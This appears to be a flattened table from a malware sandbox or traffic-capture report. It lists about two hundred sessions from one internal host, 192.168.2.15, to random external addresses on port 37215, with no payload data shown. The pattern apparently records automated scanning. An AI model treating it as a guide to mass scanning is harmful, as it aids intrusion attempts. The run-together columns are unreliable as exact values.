                                                                            26793192.168.2.1540506197.210.109.24737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26794192.168.2.1552400197.109.255.337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26795192.168.2.1542070197.208.12.5737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26796192.168.2.1534680197.185.223.22237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26797192.168.2.1545276197.91.206.16437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26798192.168.2.1535150197.177.147.2937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26799192.168.2.1535520197.222.140.14037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26800192.168.2.1560356197.61.107.5937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26801192.168.2.1545060197.207.104.437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26802192.168.2.1551478197.211.162.9537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26803192.168.2.1560054197.209.213.17937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26804192.168.2.1538938197.119.4.21837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26805192.168.2.1558200197.31.247.12737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26806192.168.2.1545560197.158.234.7837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26807192.168.2.1545580197.60.215.11937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26808192.168.2.1542454197.147.85.21137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26809192.168.2.1534674197.89.249.537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26810192.168.2.1553520197.44.39.5237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26811192.168.2.1557280197.141.66.3737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26812192.168.2.1552286197.1.22.20637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26813192.168.2.1541718197.53.237.22437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26814192.168.2.1553710197.40.89.337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26815192.168.2.1534408197.210.181.21337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26816192.168.2.1543238197.95.71.11637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26817192.168.2.1548798197.136.51.15937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26818192.168.2.1558182197.59.134.15637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26819192.168.2.1550674197.248.103.17737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26820192.168.2.1547738197.112.78.17137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26821192.168.2.1549184197.188.125.23237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26822192.168.2.1556898197.42.243.22737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26823192.168.2.1552326197.91.146.4637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26824192.168.2.1533344197.247.51.22837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26825192.168.2.1557582197.111.42.15337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26826192.168.2.1542400197.73.197.13837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26827192.168.2.1559140197.196.35.1437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26828192.168.2.1553014197.95.79.17137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26829192.168.2.1540520197.239.230.5437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26830192.168.2.1550902197.106.6.11237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26831192.168.2.1544128197.62.145.11337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26832192.168.2.1553070197.111.35.17137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26833192.168.2.1558772197.13.102.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26834192.168.2.1549174197.225.92.24037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26835192.168.2.1557716197.199.136.25337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26836192.168.2.1554012197.173.154.7337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26837192.168.2.1544076197.28.76.9037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26838192.168.2.1559920197.27.52.14537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26839192.168.2.1537258197.117.64.6537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26840192.168.2.1537940197.243.242.13737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26841192.168.2.155497641.132.11.2537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26842192.168.2.155667441.29.225.25537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26843192.168.2.154627841.175.35.6237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26844192.168.2.154634441.207.125.18937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26845192.168.2.153606841.32.31.17837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26846192.168.2.154626841.100.15.12437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26847192.168.2.153994241.36.92.8037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26848192.168.2.153303041.255.92.8037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26849192.168.2.153334241.68.122.18937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26850192.168.2.153510641.20.144.3037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26851192.168.2.155867841.29.230.21637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26852192.168.2.155752841.3.23.4437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26853192.168.2.155060841.201.217.4637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26854192.168.2.153861041.241.10.22437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26855192.168.2.155863441.48.8.637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26856192.168.2.155441641.200.208.20737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26857192.168.2.155537041.243.75.13737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26858192.168.2.153923041.214.79.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26859192.168.2.155054041.153.245.23837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26860192.168.2.155752041.157.135.7037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26861192.168.2.155505241.70.93.3937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26862192.168.2.155078441.211.194.14937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26863192.168.2.155358641.12.238.15137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26864192.168.2.155322041.140.39.6837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26865192.168.2.155183841.55.171.537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26866192.168.2.154731041.252.20.23737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26867192.168.2.155313041.67.164.6637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26868192.168.2.153575641.52.1.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26869192.168.2.153471441.177.32.7337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26870192.168.2.155532241.171.138.7437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26871192.168.2.153786441.150.87.14237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26872192.168.2.155501041.195.237.15037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26873192.168.2.153632041.207.66.537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26874192.168.2.153963041.114.84.19637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26875192.168.2.154069641.73.127.12737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26876192.168.2.156069041.190.168.18237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26877192.168.2.155896041.180.3.9337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26878192.168.2.154941041.54.43.22937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26879192.168.2.153987641.183.232.18337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26880192.168.2.154825841.150.167.24537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26881192.168.2.155254441.31.35.9837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26882192.168.2.153383641.122.63.15237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26883192.168.2.154828041.131.21.8537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26884192.168.2.154282441.254.171.7037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26885192.168.2.155042441.221.113.3937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26886192.168.2.155335641.168.244.5337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26887192.168.2.155793241.201.55.6837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26888192.168.2.154089441.85.58.10237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26889192.168.2.154723841.15.106.7137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26890192.168.2.154605841.233.69.16537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26891192.168.2.153343241.2.212.17937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26892192.168.2.154388841.99.70.7837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26893192.168.2.155240641.120.75.19037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26894192.168.2.154641441.83.55.22237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26895192.168.2.153745241.87.33.21537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26896192.168.2.154546641.185.138.6737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26897192.168.2.155027241.186.50.15237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26898192.168.2.156012841.47.248.12037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26899192.168.2.154409241.32.140.14737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26900192.168.2.153645441.170.162.17437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26901192.168.2.153861041.117.75.25237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26902192.168.2.155615041.234.72.14237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26903192.168.2.154729641.107.115.18937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26904192.168.2.154590241.121.243.7637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26905192.168.2.153308841.168.174.25037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26906192.168.2.154724641.6.70.13037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26907192.168.2.155323841.137.109.16537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26908192.168.2.154486041.119.90.10537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26909192.168.2.153874041.37.132.17537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26910192.168.2.155399241.244.45.23737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26911192.168.2.155860641.142.86.7437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26912192.168.2.155582041.229.233.17737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26913192.168.2.153594641.93.70.3337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26914192.168.2.155865241.127.174.1837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26915192.168.2.155361441.19.217.23537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26916192.168.2.154677441.94.170.21637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26917192.168.2.153845241.252.201.3837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26918192.168.2.153919441.172.87.18337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26919192.168.2.155787041.101.206.13437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26920192.168.2.155267041.12.184.10737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26921192.168.2.153414841.25.163.15637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26922192.168.2.155327841.161.92.21137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26923192.168.2.153850841.29.72.2537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26924192.168.2.154207241.8.150.137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26925192.168.2.154969641.175.119.11737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26926192.168.2.155392441.171.193.7037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26927192.168.2.154956641.161.44.21837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26928192.168.2.153768241.33.253.3737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26929192.168.2.154817441.50.2.2037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26930192.168.2.153963241.118.177.23837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26931192.168.2.155232441.233.151.21037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26932192.168.2.154846441.155.156.637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26933192.168.2.154662841.165.190.20337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26934192.168.2.153803041.158.108.5837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26935192.168.2.155280241.125.69.9337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26936192.168.2.154135841.16.147.16337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26937192.168.2.155843441.143.186.23537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26938192.168.2.154033641.57.159.13937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26939192.168.2.155944641.132.114.237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26940192.168.2.155199641.11.201.8237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26941192.168.2.155392241.14.48.15637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26942192.168.2.154887041.20.157.23337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26943192.168.2.155990041.74.87.11137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26944192.168.2.155146441.90.78.537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26945192.168.2.154307641.22.218.22037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26946192.168.2.155039241.135.5.6537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26947192.168.2.154904441.113.242.9537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26948192.168.2.156020641.254.106.12937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26949192.168.2.155847041.69.169.17237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26950192.168.2.153674441.192.152.137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26951192.168.2.155121241.156.237.10237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26952192.168.2.156034641.24.87.14737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26953192.168.2.154153641.232.37.16237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26954192.168.2.155990041.200.57.20837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26955192.168.2.154245041.10.192.17437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26956192.168.2.153941441.191.52.17237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26957192.168.2.154240441.159.39.8637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26958192.168.2.156006441.218.217.7337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26959192.168.2.153822641.140.81.5937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26960192.168.2.153772241.205.97.23237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26961192.168.2.153843841.166.105.19637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26962192.168.2.155042441.221.218.4837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26963192.168.2.154747441.245.129.18537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26964192.168.2.154119641.64.70.237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26965192.168.2.156079241.152.104.7137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26966192.168.2.153668441.120.134.18137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26967192.168.2.153542641.171.23.5837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26968192.168.2.155360041.213.249.21637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26969192.168.2.155168641.224.150.12137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26970192.168.2.154870641.58.165.12537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26971192.168.2.155211841.216.30.23837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26972192.168.2.155964841.127.150.18437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26973192.168.2.154318241.78.233.11137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26974192.168.2.156009441.66.119.17137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26975192.168.2.154000841.38.145.24237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26976192.168.2.155998641.120.131.16837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26977192.168.2.155021441.191.200.6437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26978192.168.2.155653241.98.23.24437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26979192.168.2.155909041.212.122.12437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26980192.168.2.155347241.139.164.9737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26981192.168.2.154024241.80.189.19437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26982192.168.2.155897441.145.157.20137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26983192.168.2.154395241.123.253.17837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26984192.168.2.155385041.26.81.10137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26985192.168.2.154518841.107.19.20637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26986192.168.2.154065041.63.179.12037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26987192.168.2.154010841.198.117.9437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26988192.168.2.153867041.163.248.1237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26989192.168.2.155050041.16.98.14937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26990192.168.2.155794841.16.14.6337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26991192.168.2.154779241.74.165.15037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26992192.168.2.154198441.112.18.6737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26993192.168.2.155096641.28.53.12237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26994192.168.2.154987041.49.191.20937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
